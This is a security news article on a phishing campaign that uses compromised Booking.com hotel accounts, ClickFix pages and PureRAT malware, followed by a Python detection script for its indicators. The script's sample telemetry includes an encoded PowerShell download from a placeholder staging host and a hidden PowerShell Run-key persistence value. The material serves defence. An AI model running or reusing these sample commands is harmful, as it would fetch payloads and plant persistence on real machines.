New Phishing Attack Targeting Travellers from Hotel’s Compromised Booking.com Account


A sophisticated phishing campaign is actively targeting hotel establishments and their guests through compromised Booking.com accounts, according to research published by Sekoia.

The campaign, dubbed “I Paid Twice” due to evidence of victims paying twice for their reservations, has been operating since at least April 2025 and remains active as of October 2025.

The attack scheme combines credential theft with multi-stage malware deployment, creating a complex threat targeting the global hospitality sector.

The operation begins when threat actors compromise hotel administrator systems through spearphishing emails that impersonate legitimate Booking.com communications.

Booking.com phishing pages (Source – Sekoia)

These emails contain carefully crafted messages referencing guest reservations and booking platform activities, lending them credibility with unsuspecting recipients.

The emails include malicious URLs that redirect victims through a sophisticated redirection infrastructure before deploying the ClickFix social engineering tactic.


Once victims execute the copied commands, malware infects their systems, granting attackers access to professional credentials for booking platforms like Booking.com and Expedia.

The broader criminal ecosystem supporting this operation reveals an alarming level of professionalization within cybercrime communities.

Threat actors harvest hotel administrator credentials and sell them through Russian-speaking cybercrime forums and marketplaces.

High-value compromised Booking.com accounts managing multiple properties in developed nations command prices between $5 and $5,000 depending on activity levels and reservation volumes.

This commodification of stolen credentials has created a self-sustaining fraud pipeline where specialized services handle each phase of the attack chain.

Sekoia security researchers identified the malware family PureRAT at the core of this infection chain.

Once deployed through the ClickFix redirection mechanism, PureRAT executes PowerShell commands that gather system information and download additional payload files.

The malware establishes persistence through Windows registry modifications and implements a sophisticated loader mechanism using DLL side-loading techniques.

Technical Breakdown of the Infection Mechanism

The attack initiates when victims receive phishing emails from compromised hotel accounts. Malicious URLs redirect through randomized domains following the pattern hxxps://{randomname}[.]com/[a-z0-9]{4}.

These domains employ sophisticated JavaScript that checks iframe contexts before redirecting users to ClickFix pages.

Infection chain (Source – Sekoia)

The redirection infrastructure serves as a commercialized Traffic Distribution System (TDS), concealing the attacker’s primary infrastructure from detection and takedown efforts.

Each redirection step carefully preserves URL patterns containing keywords like “admin” and “extranet” to maintain perceived legitimacy during the social engineering phase.

When users land on ClickFix pages, they encounter Booking.com brand elements alongside a reCAPTCHA interface prompting them to copy commands.

The copied command contains Base64-encoded PowerShell instructions that execute without user awareness.

This initial PowerShell command downloads secondary scripts from staging URLs ending in /bomla, which orchestrate the infection progression.

The loader gathers comprehensive system information including machine name, current user, Windows version, and installed antivirus products before downloading a ZIP archive containing executable and dynamic link library files.

Persistence mechanisms employ multiple techniques to ensure malware survives system restarts. The installation process creates Run registry keys under CurrentVersion\Run that execute PowerShell commands loading the extracted binary.

Additionally, shortcut files (.lnk) are placed in the Windows Startup directory to trigger execution during boot sequences.

The malware reports status updates at each infection stage through Command and Control servers, confirming successful progression.

The .exe binary triggers DLL side-loading using AddInProcess32.exe, a legitimate Windows component designed to host COM add-ins.

This technique allows PureRAT to execute entirely in memory without writing files to disk, significantly complicating detection efforts and enabling fileless malware execution that bypasses traditional signature-based security tools.
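As an added defensive example (not Sekoia's code and not taken from the report), the following Python turns the indicators described in this section into simple detection checks and runs them over constructed telemetry records; the event field names, domains and file paths are hypothetical:

```python
import base64
import re
# Patterns derived from the article's indicators: TDS URL shape, /bomla staging path,
# -EncodedCommand PowerShell, and Run-key persistence.
TDS_URL = re.compile(r"^https?://[a-z0-9-]+\.com/[a-z0-9]{4}$", re.I)
STAGING_URL = re.compile(r"https?://[^\s\"']+/bomla\b", re.I)
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)

# Constructed telemetry, not from the Sekoia report; field names are hypothetical.
SAMPLE_EVENTS = [
    {"type": "proxy", "url": "https://qwzrtyuk.com/a9x2"},
    {"type": "proxy", "url": "https://example.org/docs/page"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",  # a Run-dialog paste is spawned by explorer.exe
     "cmdline": "powershell -w hidden -enc " + base64.b64encode("iwr http://staging.test/bomla".encode("utf-16-le")).decode()},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"powershell -w hidden -ep bypass -File C:\Users\Public\stage2.ps1"},
    {"type": "process", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "parent": r"C:\Users\frontdesk\AppData\Local\Temp\extracted.exe", "cmdline": "AddInProcess32.exe"},
]

def decode_encoded_powershell(cmdline):
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None
def classify(event):
    """Map one telemetry record to a finding label, or None if nothing matched."""
    kind = event["type"]
    if kind == "proxy" and TDS_URL.match(event["url"]):
        return "tds-redirect-url"
    if kind == "registry" and RUN_KEY.search(event["key"]) and "powershell" in event["value"].lower():
        return "run-key-powershell-persistence"
    if kind == "process":
        image = event["image"].rsplit("\\", 1)[-1].lower()
        parent = event["parent"].lower()
        if image == "powershell.exe" and parent.endswith("explorer.exe"):
            if STAGING_URL.search(decode_encoded_powershell(event["cmdline"]) or ""):
                return "clickfix-stage1-bomla-download"
        # AddInProcess32.exe is a signed Windows/.NET binary; a non-Windows parent is the side-load tell
        if image == "addinprocess32.exe" and not parent.startswith("c:\\windows\\"):
            return "addinprocess32-sideload"
    return None

def triage(events):
    """Return [(index, label)] for every event that matched a campaign indicator."""
    return [(i, label) for i, e in enumerate(events) if (label := classify(e))]
```

The checks are deliberately narrow (exact TDS URL shape, the /bomla suffix, Run-key values that launch PowerShell, AddInProcess32.exe with a non-Windows parent) so they can be dropped into existing proxy and endpoint pipelines and tuned against local baselines.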
